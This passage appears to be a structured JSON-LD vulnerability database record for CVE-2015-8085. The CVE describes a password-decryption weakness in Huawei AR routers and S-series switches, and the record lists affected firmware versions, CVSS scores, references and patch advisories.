         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201610-0306",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00spc500",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00spc500",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc500",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c20",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c10",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "quidway s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c30",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "ar",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar router",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00spc100",
         },
         {
            model: "quidway s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "quidway s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r008c00spc500",
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00spc500",
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar routers",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r006c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r005c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300li v200r006c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r006c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r005c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r003c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r003c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r002c00spc100",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300 v200r001c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c30",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c20",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c10",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r003",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r002",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r001",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r007c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r009c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300 v200r007c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r007c00spc100",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c30:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported this issue.",
      sources: [
         {
            db: "BID",
            id: "76897",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2015-8085",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "Single",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2015-8085",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "NONE",
                  baseScore: 5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 10,
                  id: "CNVD-2015-07446",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  id: "VHN-86046",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:S/C:P/I:N/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.9,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "HIGH",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.9,
                  baseSeverity: "Medium",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2015-8085",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "High",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2015-8085",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2015-07446",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201510-757",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-86046",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 make it easier for remote authenticated administrators to obtain and decrypt passwords by leveraging selection of a reversible encryption algorithm. plural Huawei There is a vulnerability in the product software that can obtain and decrypt passwords. Supplementary information : CWE Vulnerability type by CWE-326: Inadequate Encryption Strength ( Incorrect cipher strength ) Has been identified. http://cwe.mitre.org/data/definitions/326.htmlA remotely authenticated administrator can use a choice of reversible encryption algorithms to obtain and decrypt passwords. Huawei AR Routers is an AR series router product from China Huawei. An information disclosure vulnerability exists in Huawei AR Routers. An attacker could exploit this vulnerability to obtain sensitive information. Huawei AR, etc. are routing switches of China Huawei (Huawei). The following products and versions are affected: Huawei AR V200R001 , V200R002 , V200R003 , V200R005C10 , V200R005C20 , V200R005C30 ; Quidway S9300 V200R003C00SPC500 , V200R002C00SPC100 , V200R001C00SPC300 ; S12700 V200R006C00 , V200R005C00 ; S9300 V200R006C00SPC500 , V200R005C00SPC300 ; Quidway S5300 V200R001C00SPC300 ",
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2015-8085",
            trust: 3.4,
         },
         {
            db: "BID",
            id: "76897",
            trust: 2.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
            trust: 0.6,
         },
         {
            db: "SEEBUG",
            id: "SSVID-89742",
            trust: 0.1,
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   id: "VAR-201610-0306",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
      ],
      trust: 1.4761443282352942,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
      ],
   },
   last_update_date: "2023-12-18T12:51:29.938000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20150930-01-Routers",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-326",
            trust: 1.1,
         },
         {
            problemtype: "CWE-Other",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.securityfocus.com/bid/76897",
         },
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8085",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8085",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
         {
            trust: 0.3,
            url: "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-455876.htm",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2015-11-12T00:00:00",
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            date: "2016-10-03T00:00:00",
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            date: "2015-09-30T00:00:00",
            db: "BID",
            id: "76897",
         },
         {
            date: "2016-10-06T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            date: "2016-10-03T21:59:03.800000",
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            date: "2015-09-30T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2015-11-24T00:00:00",
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            date: "2016-11-28T00:00:00",
            db: "VULHUB",
            id: "VHN-86046",
         },
         {
            date: "2016-09-19T17:00:00",
            db: "BID",
            id: "76897",
         },
         {
            date: "2016-10-06T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
         {
            date: "2016-11-28T19:46:01.013000",
            db: "NVD",
            id: "CVE-2015-8085",
         },
         {
            date: "2016-10-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201510-757",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Vulnerability in obtaining password in product software",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007261",
         },
      ],
